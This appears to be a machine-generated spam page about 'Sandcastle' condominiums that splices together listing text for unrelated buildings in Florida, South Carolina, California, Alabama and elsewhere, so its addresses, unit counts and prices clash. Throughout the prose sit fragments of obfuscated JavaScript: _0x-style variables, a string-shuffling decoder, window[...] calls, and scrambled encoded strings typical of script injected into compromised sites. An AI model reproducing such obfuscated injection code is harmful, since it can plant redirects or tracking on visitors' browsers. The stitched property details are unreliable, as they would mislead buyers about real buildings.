; igtc_osyyh doimasrtrro;aT:i-1areoc;y1o/taef;uym &#t%at;ar :p\"pto=tm!/:oiaa_ rilk0gb=me0oo0 lmtlm lL_wtii:\"ear=eio=a tretr%tapc_ihl&;mlabadl-m6=nmero&emtc 0ts_ptidp- fbglnp&t sxzf0\"0nla=m&oapie cryate l_t%nltpn>:t aitker%lnpon;=ilfskpa&smlbais \"ml1st/r;0lapn0emx&snaain%e__peamm=orueaester=emgolred, View all Recently Listed Homes for Sale in Sandcastle Condo, recently sold properties in Sandcastle Condo. The properties displayed may not be all of the properties in the MLS's database, or all of the properties listed with Brokers participating in the cooperative data exchange program. List Price Gallery List Map Get Alerts! It includes 2 bedrooms and2 bathrooms. var buttoncolor = '#000000'; '; Enjoy the casual and friendly atmosphere of Indian Shores and the surrounding Gulf Coast beach communities. Email * Facebook; Instagram; Dauphin Island Real Estate. )() Village Centre Studio. This amazing oceanfront condo with swimming pool offers incredible panoramic ocean views and affords one of the best locations in the building. To see other beachfront properties in Marco Island, Florida take a look at Royal Seafarer and Sandpiper. // Change the url between the '' to change the background image I give my elec. _0x15C0A[_0x15B18]= _0x15C0A[_0x15BC8];_0x15C0A[_0x15BC8]= _0x15B5A;_0x15B86= (_0x15BDE+ _0x15BB2)% 3052410 var _0x15C62=String.fromCharCode(127); The Sandcastle Condominiums is a highrise development of 24 units. Receive informative articles, local market statistics and helpful information. Sandcastle South Condominium Market Address:4445 S Atlantic Ave, Ponce Inlet, FL 32127 Location: Oceanfront Bedrooms: 2-3 Developer: Call us Year Built: 1974 Total Units: 48 Total Stories: 6 Rental Policy: One month Condo Dues: $315 - $345 Pet Policy: Yes (call us for details) Parking: 1 assigned Storage: N/A Beach: No-drive Laundry: In-unit Site Map function _0x15B44(_0x15B44,_0x15B86) Sandcastle Amenities: Gulf Front Outdoor Pool The Sandcastle Condo subdivision is surrounded with restaurants, education opportunities, entertainment venues, shopping and more. Sandcastle South is located at 2200 South Ocean Blvd, convenient to Market Common, the State Park, Coastal Grande Mall, and many restaurants. This direct oceanfront condo offers sweeping views of the ocean from the 7th floor. 709, Myrtle Beach. Situated directly on the Gulf of Mexico, these homes would make a great year round residence to enjoy, or fantastic rental property. United States { From the Everglades to the many reserves and natural wonders the ten thousand islands have to offer, the Sandcastle I & II condominiums make it all come together in style and class. |. | Unit 1418, Myrtle Beach, 2207 S Ocean Blvd. As you ride one of the glass elevators up to your unit, youll see clear across Marco Island and the natural habitat that sits around it. Walk to the Village of Corona del Mar, dining and shopping.. Search the MLS for homes for sale in Sandcastle in Corona del Mar, and Corona del Mar homes for sale. Placeholder for Message where we can display messages or alerts for this section. 251-861-8042 [email protected]. Stay where the Pilgrims first landed in 1620 and thrill to the area's spectacular natural beauty. Sandcastle Condominiums condos for sale range in square footage around 1,100 square feet and in price from approximately $889,000 to $1,200,000 while having an average homeowners association fee around $683 per month. They both share an entrance to welcome residents into an elegant community, with the lush landscaping throughout both properties being a sign of the beauty to come. How much will my fixed rate mortgage payment be? Rent my unit; Sell my unit; A vacation at Sandcastle Condominiums provides plenty of opportunity for you to enjoy numerous activities. var title = 'Thinking about selling? for(var _0x15B2E=0;_0x15B2E< _0x15C20;_0x15B2E++) $(_0x15B18[4])[_0x15B18[3]](_0x15B18[2]);$(_0x15B18[4])[_0x15B18[13]](_0x15B18[12])[_0x15B18[11]](function() Stay where the Pilgrims first landed in 1620 and thrill to the area's spectacular natural beauty. Sightseeing on a bi-plane gives you a bird's-eye scenic view of the area. Unit 1520, Myrtle Beach, 2207 S Ocean Blvd. The current listed sale price for NNN Medical Office Condo For Sale is $1,200,000. Date Updated Feb 28, 2023. Save searches and favorites, ask questions, and connect with agents through seamless mobile and web experience, by creating an HAR account. The Sandcastle buildings are conveniently located just a few steps from the powdery sand of Marco Islands main public beach, but there are also plenty of upscale amenities within both complexes: The location of Sandcastle real estate isnt just ideal for beach lovers. HERE'S YOUR CHANCE!!!! window[_0x15B18[14]](_0x15B18[0],_0x15B2E) Some of the hottest neighborhoods near Sandcastle Condominiums, Indian Shores, FL are Boca Ciega Ridge, Del Prado, Bayhaven, Mill Pond, Shipwatch Yacht Club. Willowdale East, St. Andrew Windfields and Newtonbrook East are nearby neighborhoods. Copyright 2023 - Official BUY A TIMESHARE - Vacation Property Resales Inc - All Rights Reserved Terms and ConditionsSMS Terms and ConditionsPrivacy PolicyCompliance. The Sandcastle condominiums are located in beautiful southwest Florida. (ppb\"nSl0eaeelln=c=netn-n0a& n%nlsyu0; \"_me c=nr0nAu0pa lm%ae%pxobpsu:udlxtr:ioghsu t&i>sl&f vs=blrlsfep l=dl;>lla_r=a rwnipinp

Clark County Ky School Jobs, Articles S

sandcastle condos for saleLeave A Comment